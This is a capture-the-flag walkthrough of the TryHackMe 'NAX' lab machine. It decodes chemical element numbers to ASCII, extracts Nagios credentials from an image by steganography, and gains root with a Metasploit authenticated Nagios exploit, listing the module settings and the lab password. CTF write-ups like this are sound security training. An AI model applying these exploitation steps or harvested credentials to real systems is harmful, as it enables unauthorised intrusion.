NAx is a machine released by Track Hack Me.
The website shows a weird page which turns out to be chemical elements after solving this puzzle we are able to download a image file. when we do some stego stuff we are able to get some credentials for nagios. there is a Nagios Authenticated exploit available for nagios. after executing this we were able to get root on the box.
nmap -sV -sC
When we go to the webpage, we see the following.
‘Decrypting’ the chemistry elements
This seems some kind of chemistry. (Ag – Hg – Ta – Sb – Po – Pd – Hg – Pt – Lr)
After some time, I googled: chemistry elements
Then I saw the following table.
Now each element represents a number:
Ag = 47
Hg = 80
Ta = 73
Sb = 51
Po = 84
Pd = 46
Hg = 80
Pt = 78
Lr = 103
Now we place those number behind each other.
47 80 73 51 84 46 80 78 103
Converting ascii to test
Now I put those numbers into the webpage table.
We found a new URL/image.
In order to get the image on the system, I download it.
Now performed some basic stego stuff.
We see the artist is Piet Mondrian.
So, I searched for:
Piet Mondrian crypto
Then I saw this reddit page:
From this reddit page, I can up to a webpage.
After reading this I googled the following.
Extract information from the imgae.
After we upload and execute it we see the following.
Some creddentails for something called: Nagios.
Locating the right exploit
We can use this exploit, because we already have the credentials to login.
Configuring msf exploit
Commands which I used to configure the exploit correctly.
set PASSWORD n3p3UQ&9BjLp4$7uhWdY
set USERNAME nagiosadmin
set rhosts 10.10.233.26
set lhost tun0
We are root now.
Made by Icel0rd